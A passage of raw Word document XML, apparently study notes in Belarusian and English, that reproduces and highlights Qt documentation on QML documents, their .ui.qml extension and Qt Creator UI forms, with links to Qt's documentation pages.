            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtqml-qmlextensionplugins-qmlextensionplugins-pro.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRDefault="00B30B71" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B30B71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Не… мне гэта не дапамагло…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00E21B6D" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId339" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>project</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5.1/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>documents</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>topic</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="412" w:name="_Toc483000619"/>
      <w:bookmarkStart w:id="413" w:name="_Toc483003636"/>
      <w:bookmarkStart w:id="414" w:name="_Toc483603972"/>
      <w:bookmarkStart w:id="415" w:name="_Toc483605192"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Documents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="412"/>
      <w:bookmarkEnd w:id="413"/>
      <w:bookmarkEnd w:id="414"/>
      <w:bookmarkEnd w:id="415"/>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML document</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a string which conforms to QML document syntax. A document defines a </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. A document is generally loaded from a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>".qml"</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> stored either locally or remotely, but </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be constructed manually in code</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. An instance of the object type defined by a document may be created using a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId340" w:history="1">
        <w:r w:rsidRPr="007A1926">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in QML code, or a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId341" w:history="1">
        <w:r w:rsidRPr="007A1926">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlComponent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in C++. Alternatively</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, if the </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object type is explicitly exposed to the QML type system with a particular type name, the type may be used directly in object declarations in other documents</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The ability to define re-usable QML object types in documents is an important enabler to allow clients to write </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modular</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>highly readable</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>maintainable code</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Since Qt 5.4, a document can also have the file extension</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>".ui.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The QML engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles these files like standard .qml files and ignores the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.ui</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">part of the extension. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1926">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Creator</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles those files as</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId342" w:history="1">
        <w:r w:rsidRPr="007022E0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>UI forms</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for the Qt Quick Designer. The files can contain only a subset of the QML language that is defined by Qt Creator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="416" w:name="structure-of-a-qml-document"/>
      <w:bookmarkStart w:id="417" w:name="_Toc483000620"/>
      <w:bookmarkStart w:id="418" w:name="_Toc483003637"/>
      <w:bookmarkStart w:id="419" w:name="_Toc483603973"/>
      <w:bookmarkStart w:id="420" w:name="_Toc483605193"/>
      <w:bookmarkEnd w:id="416"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Structure of a QML Document</w:t>
      </w:r>
      <w:bookmarkEnd w:id="417"/>
      <w:bookmarkEnd w:id="418"/>
      <w:bookmarkEnd w:id="419"/>
      <w:bookmarkEnd w:id="420"/>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
